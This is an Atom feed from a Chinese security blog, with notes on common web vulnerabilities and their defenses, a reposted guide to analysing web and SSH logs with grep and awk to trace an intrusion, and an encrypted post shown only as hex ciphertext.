-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathatom.xml
More file actions
474 lines (237 loc) · 232 KB
/
atom.xml
File metadata and controls
474 lines (237 loc) · 232 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>vQAQv's blog | Just Do It!</title>
<subtitle>To Be A Better Man</subtitle>
<link href="https://cr4ckm3.top/atom.xml" rel="self"/>
<link href="https://cr4ckm3.top/"/>
<updated>2021-09-01T03:37:48.272Z</updated>
<id>https://cr4ckm3.top/</id>
<author>
<name>vQAQv</name>
</author>
<generator uri="https://hexo.io/">Hexo</generator>
<entry>
<title>《Vulnerability box》gitbook笔记</title>
<link href="https://cr4ckm3.top/2019/08/30/%E5%90%84%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0/"/>
<id>https://cr4ckm3.top/2019/08/30/%E5%90%84%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0/</id>
<published>2019-08-30T10:00:45.023Z</published>
<updated>2021-09-01T03:37:48.272Z</updated>
<content type="html"><![CDATA[<p>Vulnerability box 笔记</p><span id="more"></span><h2 id="0x00-SQL注入漏洞"><a href="#0x00-SQL注入漏洞" class="headerlink" title="0x00 SQL注入漏洞"></a>0x00 SQL注入漏洞</h2><h3 id="漏洞简述:"><a href="#漏洞简述:" class="headerlink" title="漏洞简述:"></a>漏洞简述:</h3><p>SQL注入漏洞是因为网站应用程序在编写时未对用户提交至服务器的数据进行校验,没有有效的对特殊字符过滤。</p><h3 id="防御:"><a href="#防御:" class="headerlink" title="防御:"></a>防御:</h3><ul><li>对用户数据进行严格过滤</li><li>防火墙</li><li>数据库操作监控</li><li>正则过滤</li></ul><h2 id="0x01-目录遍历漏洞"><a href="#0x01-目录遍历漏洞" class="headerlink" title="0x01 目录遍历漏洞"></a>0x01 目录遍历漏洞</h2><h3 id="漏洞简述:-1"><a href="#漏洞简述:-1" class="headerlink" title="漏洞简述:"></a>漏洞简述:</h3><p>获取系统文件及服务器配置文件,利用服务器API、文件标准权限进行攻击。</p><h3 id="防御:-1"><a href="#防御:-1" class="headerlink" title="防御:"></a>防御:</h3><ul><li>修改配置文件</li><li>设置目录权限</li><li>每个目录下创建一个控的index.html</li></ul><h2 id="0x02-跨站脚本漏洞-xss漏洞"><a href="#0x02-跨站脚本漏洞-xss漏洞" class="headerlink" title="0x02 跨站脚本漏洞(xss漏洞)"></a>0x02 跨站脚本漏洞(xss漏洞)</h2><h3 id="漏洞简述:-2"><a href="#漏洞简述:-2" class="headerlink" title="漏洞简述:"></a>漏洞简述:</h3><p>利用漏洞在网站中插入恶意代码,它能够获取网站管理员或其他用户的cookie,隐蔽运行网页木马,权限大的甚至可以做出更大的操作。</p><h4 id="危害:"><a href="#危害:" class="headerlink" title="危害:"></a>危害:</h4><ul><li>钓鱼,盗取隐私信息。</li><li>传播脚本蠕虫,网页挂马。</li><li>劫持用户会话,利用用户身份进行恶意操作。<h2 id="防御:-2"><a href="#防御:-2" class="headerlink" title="防御:"></a>防御:</h2></li><li>编码转义</li><li>xss filter 黑白名单</li><li>处理富文本(限制只能使用安全标签)</li><li>设置Httponly</li></ul><h2 id="0x03-跨站请求伪造漏洞-csrf漏洞"><a href="#0x03-跨站请求伪造漏洞-csrf漏洞" class="headerlink" title="0x03 跨站请求伪造漏洞(csrf漏洞)"></a>0x03 跨站请求伪造漏洞(csrf漏洞)</h2><h3 id="漏洞简述:-3"><a href="#漏洞简述:-3" class="headerlink" title="漏洞简述:"></a>漏洞简述:</h3><p>攻击者通过伪造来自受信任用户的请求,达到增、删、改网站内容的目的。<br>攻击者冒充用户/管理员,伪造请求,进行篡改、转帐、改密码、发邮件等非法操作</p><h3 id="防御:-3"><a href="#防御:-3" class="headerlink" title="防御:"></a>防御:</h3><ul><li>过滤用户输入,不允许发布含有站内操作URL的链接</li><li>在浏览其它站点前登出站点或者在浏览器会话结束后清理浏览器的cookie</li><li>对于web站点,将持久化的授权方法(例如cookie或者HTTP授权)切换为瞬时的授权方法(在每个form中提供隐藏field)</li><li>关键操作使用验证码,只接受 POST 请求,GET请求应该只浏览而不改变服务器端资源<h3 id="服务端的防御:"><a href="#服务端的防御:" class="headerlink" title="服务端的防御:"></a>服务端的防御:</h3></li><li>验证HTTP Referer字段。</li><li>请求地址中添加token并验证(token不放在cookie中,放在http请求参数中,服务端对其进行验证)</li><li>将token加入http头属性中,避免了token出现在浏览器中,被泄露。<h3 id="客户端防御:"><a href="#客户端防御:" class="headerlink" title="客户端防御:"></a>客户端防御:</h3></li><li>为了配合服务端对token的验证,那么客户端也需要在访问时生成token,这是利用 js 来给 html 中的链接和表单请求地址附加 csrftoken 代码,其中已定义 token 为全局变量,其值可以从 session 中得到。</li></ul><h2 id="0x04-URL-重定向漏洞-URL跳转"><a href="#0x04-URL-重定向漏洞-URL跳转" class="headerlink" title="0x04 URL 重定向漏洞(URL跳转)"></a>0x04 URL 重定向漏洞(URL跳转)</h2><h3 id="漏洞简述:-4"><a href="#漏洞简述:-4" class="headerlink" title="漏洞简述:"></a>漏洞简述:</h3><p>returnURL修改为指向恶意站点,攻击者可以发起网络钓鱼,因窃取用户凭证。</p><h3 id="防御:-4"><a href="#防御:-4" class="headerlink" title="防御:"></a>防御:</h3><ul><li>web应用防火墙</li><li>对用户的输入进行严格过滤</li></ul><h2 id="0x05-文件上传漏洞"><a href="#0x05-文件上传漏洞" class="headerlink" title="0x05 文件上传漏洞"></a>0x05 文件上传漏洞</h2><h3 id="漏洞简述:-5"><a href="#漏洞简述:-5" class="headerlink" title="漏洞简述:"></a>漏洞简述:</h3><p>存在任意上传,上传没有限制文件格式,被恶意上传webshell文件。</p><h3 id="防御:-5"><a href="#防御:-5" class="headerlink" title="防御:"></a>防御:</h3><ul><li>对上传文件格式进行严格校验及安全扫描,防止上传恶意脚本文件</li><li>严格限制可上传的文件类型</li><li>严格限制上传的文件路径</li><li>文件内容服务端校验</li><li>设置权限限制,禁止上传目录的执行权限</li><li>上传文件重命名</li></ul><h2 id="0x06-Unicode-编码转换漏洞"><a href="#0x06-Unicode-编码转换漏洞" class="headerlink" title="0x06 Unicode 编码转换漏洞"></a>0x06 Unicode 编码转换漏洞</h2><h3 id="漏洞简述:-6"><a href="#漏洞简述:-6" class="headerlink" title="漏洞简述:"></a>漏洞简述:</h3><p>Unicode在编码转换过程中会忽略某些字符,导致攻击者可拆分攻击关键字等字符绕过安全设备的检测。</p><h3 id="防御:-6"><a href="#防御:-6" class="headerlink" title="防御:"></a>防御:</h3><ul><li>修改中间件、过滤某些字符</li><li>web应用层防火墙</li></ul><h2 id="0x07-旁站攻击漏洞"><a href="#0x07-旁站攻击漏洞" class="headerlink" title="0x07 旁站攻击漏洞"></a>0x07 旁站攻击漏洞</h2><h1 id="参考来自"><a href="#参考来自" class="headerlink" title="参考来自"></a>参考来自</h1><p><a href="https://book.thief.one/">nMask–>Vulnerability box</a></p>]]></content>
<summary type="html"><p>Vulnerability box 笔记</p></summary>
<category term="笔记" scheme="https://cr4ckm3.top/tags/%E7%AC%94%E8%AE%B0/"/>
</entry>
<entry>
<title>Web日志安全分析技巧(转)</title>
<link href="https://cr4ckm3.top/2019/07/05/Apache_Web%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90/"/>
<id>https://cr4ckm3.top/2019/07/05/Apache_Web%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90/</id>
<published>2019-07-04T16:00:00.000Z</published>
<updated>2019-08-30T10:00:43.483Z</updated>
<content type="html"><![CDATA[<h1 id="Web日志安全分析技巧"><a href="#Web日志安全分析技巧" class="headerlink" title="Web日志安全分析技巧"></a><p style="text-align: center;">Web日志安全分析技巧</p></h1><p>Web访问日志记录了Web服务器接收处理请求及运行时错误等各种原始信息。通过对WEB日志进行的安全分析,不仅可以帮助我们定位攻击者,还可以帮助我们还原攻击路径,找到网站存在的安全漏洞并进行修复。</p><span id="more"></span><h2 id="0x01-Web日志"><a href="#0x01-Web日志" class="headerlink" title="0x01 Web日志"></a>0x01 Web日志</h2><p>我们来看一条Apache的访问日志:</p><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">127</span>.<span class="number">0</span>.<span class="number">0</span>.<span class="number">1</span> - - [<span class="number">11</span>/Jun/<span class="number">2018</span>:<span class="number">12</span>:<span class="number">47</span>:<span class="number">22</span> +<span class="number">0800</span>] "GET /login.html HTTP/<span class="number">1</span>.<span class="number">1</span>" <span class="number">200</span> <span class="number">786</span> "-" "Mozilla/<span class="number">5</span>.<span class="number">0</span> (Windows NT <span class="number">10</span>.<span class="number">0</span>; WOW64) AppleWebKit/<span class="number">537</span>.<span class="number">36</span> (KHTML, like Gecko) Chrome/<span class="number">66</span>.<span class="number">0</span>.<span class="number">3359</span>.<span class="number">139</span> Safari/<span class="number">537</span>.<span class="number">36</span>"</span><br></pre></td></tr></table></figure><p>通过这条Web访问日志,我们可以清楚的得知用户在什么IP、什么时间、用什么操作系统、什么浏览器的情况下访问了你网站的哪个页面,是否访问成功。</p><p>本文通过介绍Web日志安全分析时的思路和常用的一些技巧。</p><h2 id="0x02-日志分析技巧"><a href="#0x02-日志分析技巧" class="headerlink" title="0x02 日志分析技巧"></a>0x02 日志分析技巧</h2><p>在对WEB日志进行安全分析时,一般可以按照两种思路展开,逐步深入,还原整个攻击过程。</p><p>第一种:确定入侵的时间范围,以此为线索,查找这个时间范围内可疑的日志,进一步排查,最终确定攻击者,还原攻击过程。</p><p>第二种:攻击者在入侵网站后,通常会留下后门维持权限,以方便再次访问,我们可以找到该文件,并以此为线索来展开分析。</p><p>常用分析工具:</p><p>Window下,推荐用 EmEditor 进行日志分析,支持大文本,搜索效率还不错。</p><p>Linux下,使用Shell命令组合查询分析。</p><p>Shell+Linux命令实现日志分析,一般结合grep、awk等命令等实现了几个常用的日志分析统计技巧。</p><p>Apache日志分析技巧:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">1、列出当天访问次数最多的IP命令:</span><br><span class="line">cut -d- -f 1 log_file|uniq -c | sort -rn | head -20</span><br><span class="line"></span><br><span class="line">2、查看当天有多少个IP访问:</span><br><span class="line">awk <span class="string">'{print $1}'</span> log_file|sort|uniq|wc -l</span><br><span class="line"></span><br><span class="line">3、查看某一个页面被访问的次数:</span><br><span class="line">grep <span class="string">"/index.php"</span> log_file | wc -l</span><br><span class="line"></span><br><span class="line">4、查看每一个IP访问了多少个页面:</span><br><span class="line">awk <span class="string">'{++S[$1]} END {for (a in S) print a,S[a]}'</span> log_file</span><br><span class="line"></span><br><span class="line">5、将每个IP访问的页面数进行从小到大排序:</span><br><span class="line">awk <span class="string">'{++S[$1]} END {for (a in S) print S[a],a}'</span> log_file | sort -n</span><br><span class="line"></span><br><span class="line">6、查看某一个IP访问了哪些页面:</span><br><span class="line">grep ^111.111.111.111 log_file| awk <span class="string">'{print $1,$7}'</span></span><br><span class="line"></span><br><span class="line">7、去掉搜索引擎统计当天的页面:</span><br><span class="line">awk <span class="string">'{print $12,$1}'</span> log_file | grep ^\"Mozilla | awk <span class="string">'{print $2}'</span> |sort | uniq | wc -l</span><br><span class="line"></span><br><span class="line">8、查看2018年6月21日14时这一个小时内有多少IP访问:</span><br><span class="line">awk <span class="string">'{print $4,$1}'</span> log_file | grep 21/Jun/2018:14 | awk <span class="string">'{print $2}'</span>| sort | uniq | wc -l</span><br><span class="line"></span><br><span class="line">9、在未有系统,且日志量不大时可以采用对accesslog进行uri、ip等top10罗列,具体作用用于分析是否存在恶意ip、哪个接口访问过高等维度。</span><br><span class="line">awk <span class="string">'{print $7}'</span> access.log | sort -n |uniq -c | sort -rn | head -n 10</span><br></pre></td></tr></table></figure><h2 id="0x03-日志分析案例"><a href="#0x03-日志分析案例" class="headerlink" title="0x03 日志分析案例"></a>0x03 日志分析案例</h2><p>Web日志分析实例:通过nginx代理转发到内网某服务器,内网服务器某站点目录下被上传了多个图片木马,虽然II7下不能解析,但还是想找出谁通过什么路径上传的。</p><p>在这里,我们遇到了一个问题:由于设置了代理转发,只记录了代理服务器的ip,并没有记录访问者IP?这时候,如何去识别不同的访问者和攻击源呢?</p><p>这是管理员日志配置不当的问题,但好在我们可以通过浏览器指纹来定位不同的访问来源,还原攻击路径。</p><p>1、定位攻击源</p><p>首先访问图片木马的记录,只找到了一条,由于所有访问日志只记录了代理IP,并不能通过IP来还原攻击路径,这时候,可以利用浏览器指纹来定位。</p><p>浏览器指纹:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.1;+WOW64;+Trident/7.0;+SLCC2;+.NET+CLR+2.0.50727;+.NET+CLR+3.5.30729;+.NET+CLR+3.0.30729;+.NET4.0C;+.NET4.0E)</span><br></pre></td></tr></table></figure><p>2、搜索相关日志记录</p><p>通过筛选与该浏览器指纹有关的日志记录,可以清晰地看到攻击者的攻击路径。</p><p>3、对找到的访问日志进行解读,攻击者大致的访问路径如下:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">A、攻击者访问首页和登录页</span><br><span class="line">B、攻击者访问MsgSjlb.aspx和MsgSebd.aspx</span><br><span class="line">C、攻击者访问Xzuser.aspx</span><br><span class="line">D、攻击者多次POST(怀疑通过这个页面上传模块缺陷)</span><br><span class="line">E、攻击者访问了图片木马</span><br></pre></td></tr></table></figure><p>打开网站,访问Xzuser.aspx,确认攻击者通过该页面的进行文件上传了图片木马,同时,发现网站了存在越权访问漏洞,攻击者访问特定URL,无需登录即可进入后台界面。通过日志分析找到网站的漏洞位置并进行修复。</p><h2 id="0x04-日志统计分析技巧"><a href="#0x04-日志统计分析技巧" class="headerlink" title="0x04 日志统计分析技巧"></a>0x04 日志统计分析技巧</h2><blockquote><p>查看Auth.log,检查SSH是否被扫</p></blockquote><p>查看用密码登陆成功的IP地址及次数</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">grep <span class="string">"Accepted password for root"</span> /var/<span class="built_in">log</span>/auth.log | awk <span class="string">'{print $11}'</span> | sort | uniq -c | sort -nr | more</span><br></pre></td></tr></table></figure><p>查看用密码登陆失败的IP地址及次数</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">grep <span class="string">"Failed password for root"</span> /var/<span class="built_in">log</span>/auth.log | awk <span class="string">'{print $11}'</span> | sort | uniq -c | sort -nr | more</span><br></pre></td></tr></table></figure><p>统计爬虫:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">grep -E <span class="string">'Googlebot|Baiduspider'</span> /www/logs/access.2019-02-23.log | awk <span class="string">'{ print $1 }'</span> | sort | uniq</span><br></pre></td></tr></table></figure><p>统计浏览器:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat /www/logs/access.2019-02-23.log | grep -v -E <span class="string">'MSIE|Firefox|Chrome|Opera|Safari|Gecko|Maxthon'</span> | sort | uniq -c | sort -r -n | head -n 100</span><br></pre></td></tr></table></figure><p>IP 统计:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">grep <span class="string">'23/May/2019'</span> /www/logs/access.2019-02-23.log | awk <span class="string">'{print $1}'</span> | awk -F<span class="string">'.'</span> <span class="string">'{print $1"."$2"."$3"."$4}'</span> | sort | uniq -c | sort -r -n | head -n 10</span><br><span class="line"> 2206 219.136.134.13</span><br><span class="line"> 1497 182.34.15.248</span><br><span class="line"> 1431 211.140.143.100</span><br><span class="line"> 1431 119.145.149.106</span><br><span class="line"> 1427 61.183.15.179</span><br><span class="line"> 1427 218.6.8.189</span><br><span class="line"> 1422 124.232.150.171</span><br><span class="line"> 1421 106.187.47.224</span><br><span class="line"> 1420 61.160.220.252</span><br><span class="line"> 1418 114.80.201.18</span><br></pre></td></tr></table></figure><p>统计网段:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat /www/logs/access.2019-02-23.log | awk <span class="string">'{print $1}'</span> | awk -F<span class="string">'.'</span> <span class="string">'{print $1"."$2"."$3".0"}'</span> | sort | uniq -c | sort -r -n | head -n 200 </span><br></pre></td></tr></table></figure><p>统计域名:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat /www/logs/access.2019-02-23.log |awk <span class="string">'{print $2}'</span>|sort|uniq -c|sort -rn|more</span><br></pre></td></tr></table></figure><p>HTTP 状态:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">cat /www/logs/access.2019-02-23.log |awk <span class="string">'{print $9}'</span>|sort|uniq -c|sort -rn|more</span><br><span class="line">5056585 304</span><br><span class="line">1125579 200</span><br><span class="line"> 7602 400</span><br><span class="line"> 5 301</span><br></pre></td></tr></table></figure><p>URL 统计:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat /www/logs/access.2019-02-23.log |awk <span class="string">'{print $7}'</span>|sort|uniq -c|sort -rn|more</span><br></pre></td></tr></table></figure><p>文件流量统计:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cat /www/logs/access.2019-02-23.log |awk <span class="string">'{sum[$7]+=$10}END{for(i in sum){print sum[i],i}}'</span>|sort -rn|more</span><br><span class="line">grep <span class="string">' 200 '</span> /www/logs/access.2019-02-23.log |awk <span class="string">'{sum[$7]+=$10}END{for(i in sum){print sum[i],i}}'</span>|sort -rn|more</span><br></pre></td></tr></table></figure><p>URL访问量统计:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat /www/logs/access.2019-02-23.log | awk <span class="string">'{print $7}'</span> | egrep <span class="string">'\?|&'</span> | sort | uniq -c | sort -rn | more</span><br></pre></td></tr></table></figure><p>脚本运行速度:</p><p>查出运行速度最慢的脚本</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">grep -v 0$ /www/logs/access.2019-02-23.log | awk -F <span class="string">'\" '</span> <span class="string">'{print $4" " $1}'</span> web.log | awk <span class="string">'{print $1" "$8}'</span> | sort -n -k 1 -r | uniq > /tmp/slow_url.txt</span><br></pre></td></tr></table></figure><p>IP, URL 抽取:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tail -f /www/logs/access.2019-02-23.log | grep <span class="string">'/test.html'</span> | awk <span class="string">'{print $1" "$7}'</span></span><br></pre></td></tr></table></figure><ul><li>转载来源</li></ul><p><a href="https://mp.weixin.qq.com/s/CtnHy9X7_csTwrG5KJvDjg">Bypass微信公众号-Web日志安全分析技巧</a></p>]]></content>
<summary type="html"><h1 id="Web日志安全分析技巧"><a href="#Web日志安全分析技巧" class="headerlink" title="Web日志安全分析技巧"></a><p style="text-align: center;">Web日志安全分析技巧</p></h1><p>Web访问日志记录了Web服务器接收处理请求及运行时错误等各种原始信息。通过对WEB日志进行的安全分析,不仅可以帮助我们定位攻击者,还可以帮助我们还原攻击路径,找到网站存在的安全漏洞并进行修复。</p></summary>
<category term="日志分析" scheme="https://cr4ckm3.top/tags/%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90/"/>
</entry>
<entry>
<title>一些PHP代码分析学习笔记</title>
<link href="https://cr4ckm3.top/2019/07/05/%E4%B8%80%E4%BA%9Bphp%E7%AC%94%E8%AE%B0/"/>
<id>https://cr4ckm3.top/2019/07/05/%E4%B8%80%E4%BA%9Bphp%E7%AC%94%E8%AE%B0/</id>
<published>2019-07-04T16:00:00.000Z</published>
<updated>2019-08-30T10:00:44.793Z</updated>
<content type="html"><![CDATA[<div class="hbe hbe-container" id="hexo-blog-encrypt" data-wpm="Oh, this is an invalid password. Check and try again, please." data-whm="OOPS, these decrypted content may changed, but you can still have a look."> <script id="hbeData" type="hbeData" data-hmacdigest="abca0a1d38efbba20e84d44ec59760921699ace4dd52e3cb8ea36e54311c1a47">11107969db241a3baf2420b88a9b9d79e916510f958a5b765cb1c2659f3103bdcbb31942d4eb48679c51a045b2767b26619525ce7c0d7806793ee6fc145dac4c5f8dd231a65d47646c0c7891eb708aac3517d4a3494af8ae018fad8a8e0bcfc6983212cce97e7c8b39564d6a58232ecd9d9d210c0aa39d007d45c756042fb3ddfdb32758f591b1c2a365131020fd48044b91467063857b20f7ef3b306254244d9e986c816a85192baae3c7085a77722821467b0c895dfa7e9c42937a8c415ed280f395cfc311862648688bf61aef2be87944a42de6f7d7bfa5272fb402ba15d8809b71d55a491d3a1bd95d85995734d5caa1cd6fb239839eb0b08d18b2632663c7562abe518a92f3867322502c6986a3150ea4dfecca6e18b6abc1d19f7b43d8a2f27f21ba7e46222719ff55a456af3998eff3c9c267e92461111fed983a66e64a4b633bcafb3bcfbbc6540cf29d6551cf4a4733303543f99a7bfc5d36219f4759b4d2798926a3825d04f55a392e632820472f4719afd989f3e96d3adc955e63bdcdc73228d6d0c55157150dada22174569318f8042dc68d626a32aaa8be544b2899bbbe423b974f3532fe1f6c5d1f706275eefd2309b6a1a08e0207c09233d052880c5e88d922797de6f0fa8898102f26dac39bd2b1b709fdbea03badbae9231ee45a6333d7d54fb67ed008379e283d0b5db8e05028a272e72593bab9eb43826c35a0e42fb2ef970570aeac8fea15df5bea9c19ede3815f0a5db3056070b751522ce348798dc4949bc740476c125f48559338e76326f3184563246dce79c5aeba0fc96975f5665a96a378a45dc3a0424668e98a9ad78791a1d50e156c02a0b91cdddc9bddb264c60d492a5fb9f2800f30d1b4e4490e1f0d80c743eeba0ec6810d3e5595745c311eb8c092a250d89f26cb5acac8c68446d5bd25640727748d66ace76cb35d8b47b0d1419d9d01a3973fa08846e7da1287c4eac23605fc4784f7daea2941b4b8b22b524c0855dd4c59236017ada761f0816cf39b2a1ce35a064806fdd331c2d375cb387f254c6b98b2a6f44666753b73d63f3863d027c458ae6e79aea2f443006097ebd678ee06d245ded6720b8e3b890b8f410f6cd18ed89f8d0cdde06276e5612976bbc1410b6025a6e9357fe004b8924b0a8829f700815e820a4073dc21ace6618722d8e226ec72538589d6b214ee4b66eb787e8f7d41607f4ac04957b91332582a12cc62282f8994f100dedf736bd00e2d469dbf4b477c7b02f5bda24dd0ee8aad5a8755b5f1cdf03f57a9b74e90aeb2b6d3c82cc7d414cdeadc9e6fb4a834cff1123270d901b244c848daf9d873173f7eff3d6320debf69e7c7094ad8a3182dd2406542da4001c5ce2caa41c667480a094a4f5670695ad15ab71b5099855c7a66960037fcdf65af01e3cdaaa303b638cc62af316e4d1546e07087f0496bdd9678a0ac2e8b61c36afcc9d812eaac27ac4d059559a5e1bbc14c255ac6685c82cfffd6fae0b86582fa6799eeb1fa56d8a14d82173cc926e221b40d72f22109c74bf1822d9775dfb46cdfe6482cab2949494ac89b4fdff3596fcd194b4fdc34d3e333f3bb97cfce551d69853f5e811b3738b197e0b43d65648e209dbf6782c8edccad42ae2bdf8c2497f3425faf5d5a95b7d5075d09d78f91d04bb8e2463f169eaa41d6a81617c76fe99d511c96191ea02cf305aef356eb87b763ff93eacede023b6245805bda63b21491eb488992263f32c8bb7b9a53ea40a09f2255d3dc89eeb14a22f64773df3851777c59130750d4648a4a62a4a6a4fbf154182056f9d34d807b512ad51454370d3f4cd0602121a9209419744dde567be52afdf41cc093c8f8945aff47a5af22b19b7a06dfc3744cf27f7eb0d8b4bfed18a71198f0b04739848ecbd1c60ab140e439ba1760e8b91b70ed66bb34384cda98a03ae94af4c334c6c5e2f5842b3bb6e7500e680d92b1211fb307949a9c814db3455a93ff71aaa62948707c9622d7a0d04ccc4e59ef4f02c30932faedd083c0a1262a30a4afb1138451703827bfbd2e8880a41a6e92c5c25ddab9d790f86692219ab97a3988bb85b8ea0c18669186995647897104716574f68da6dfed7ae6977281d9d24e2f2972802e9ee34e98914fa048e938a0f59d2b36379427c37cdb6b1e1e5d2d1eed158af230212bf330680a0139f01f7a1410c5188fdbed4962f9f663f053bcf9ebb688c7246b67be320b06b997126141c278104415c144c20f8fd9a7137fca327c10e7f2ba9436ab076c566162d8707c7147b351ce92ce26d01b0d144fa296087bf1f15fec75c8e49c67c64ad5f2be49639bad9bbeca5145ded763e3ebe1ec3ea1da788b6ea7e41e0d34e7e14ddaa64fd607763889a3d4d6dc5ce57583adfe4b211efa41d630beecd3b24a66dd5a45e7f2d2cb34435e3ad80186f700e7cf54521a35821243d445de3eefafff03e031e32c74a16d69c4c9ca5e8234ed95c1ef24e249997496823f8a2e31661086eeaae75eabe9e88e5ced44adc465579c2ee0caa24f92808c72f7d2b6c5b027986005ce6a1bf3a7e8e6cfda93bb0468b48c9477e2a94bc788f689eaede19a20f393560a9c9ea243318aa3ba8872bc6c48f125cc2f9f075f571efcd2bca1fc07f928483cfa4b327353fe7a549d40c791784ed7eae444a56e3b6fdd0dff02997f904b189928290592f48dd145a58af34a1453172d10bae5a0efaf07629796fad63fd1c3354b9a0cb39c7c38d603d1ad224be25dc04dabdcd67dfc44ba6b41c7d02d08fef8e91c68b1d7b820d0b216df6c5eb68e1e82d6c7087f356419eeaf639e02c843918618b3ff918822fb3f00dba2824eb6a70552b78e229501b29bb3634ffbfc95cd29282e1afe4fc9851167cdfa5ff4a22007849b8be905df53ebafa79ce2ace63843ad8501e340e6fc86334add505dcbdf8ef8cc3bc9c1c95614fe2f08e53575dd6938b47ec3543a002420ca9c1dc15b55df72ed3f7f5cc34a2694df6f4ca93f49d6227e9cf29885b634ce041f33c72b8e9e0c6c5eef7828ae0eaf46f04fd300be63f31f5662b5287fc45e4ab3f03c4485b549f3c360e10fd6d04cee4c6ad71d5520b57a2a0a42bfdd182546f5138cc446bdf0c56424dbc6f8c36166e40eb4e5900b4c9c999632bd75b16f7039c422e1c844b12adb9dac987a5f608374e2c07c02af767b4352035a12ffd961835aa1b0f5f490106e18940c62f2c65ba216f53174a22978db069d7ef46b2cb6a7f3a63782562fb61f0909a0881601d63d6d3c690a86668780d32d7c20fb837def02625d7ba13f483bf4a162386fe45d2b36ca5345fae9aec8a5b4c10bae53de88e2f1238d309010fc0b8b6eefa5dce9e3091a86deb460bf30a8da861bbab6df0c61f1a2c268aeb6bb89dd20ba48cf31a0303a23d2672e537df128fca06950155bbd263c98320f27ba9c5b5ca4771c9b355a1a